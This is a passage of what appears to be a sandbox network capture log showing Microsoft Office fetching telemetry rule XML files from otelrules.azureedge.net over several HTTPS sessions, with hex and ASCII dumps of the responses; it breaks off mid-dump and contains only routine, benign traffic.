2024-11-15 13:10:16 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:16 UTC	515	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:16 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: e48d079a-201e-00aa-1709-373928000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131016Z-1866b5c5fbb7lvschC1DFW4rm000000001c0000000001uts x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:16 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	49862	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:16 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:16 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:16 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 22a3ed20-101e-005a-80a7-36882b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131016Z-1866b5c5fbb5hnj5hC1DFW18sc00000001h00000000057hg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:16 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	49863	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:16 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:16 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:16 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 839b5edb-301e-0000-1240-36eecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131016Z-1866b5c5fbbzzh8chC1DFWdrc400000000x000000000cp48 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:16 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	49864	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:16 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:16 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:16 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: 6cee656e-501e-007b-6d86-365ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131016Z-164f84587bfjxw6fhC1DFWq94400000001eg000000009bp7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:16 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	49865	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:16 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:16 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:16 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: 70ecc3c7-201e-005d-13af-36afb3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131016Z-16547b76f7fxdzxghC1DFWmf7n0000000nbg00000000305c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:16 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	49866	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:17 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:17 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:17 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 1c13518a-801e-00a0-75ff-362196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131017Z-164f84587bfj5xwnhC1DFW3a2800000000u000000000815s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:17 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	49867	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:17 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:17 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:17 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: 4901c883-e01e-0020-44af-36de90000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131017Z-16547b76f7f7scqbhC1DFW0m5w0000000my000000000ep0r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:17 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	49868	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:17 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:17 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:17 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: d62d9096-801e-0048-06af-36f3fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131017Z-16547b76f7fw2955hC1DFWsptc00000001xg000000002cr0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:17 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	49869	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:17 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:17 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:17 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: bd00a7b8-901e-002a-72af-367a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131017Z-16547b76f7fgvq8chC1DFWhd2w00000002000000000027cf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:17 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	49870	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:17 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:18 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:17 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: 94e04423-001e-008d-67ab-36d91e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131017Z-16547b76f7fp6mhthC1DFWrggn0000000n7g00000000b5k0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:18 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	49871	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:18 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:18 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:18 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: 36c9bc1a-b01e-003e-0509-378e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131018Z-1866b5c5fbbr78bbhC1DFWqz2n00000001cg00000000c4m6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:18 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	49872	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:18 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:18 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:18 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: e59c32fc-b01e-005c-5110-364c66000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131018Z-164f84587bfsgfx9hC1DFWw1as000000016000000000aqbt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:18 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 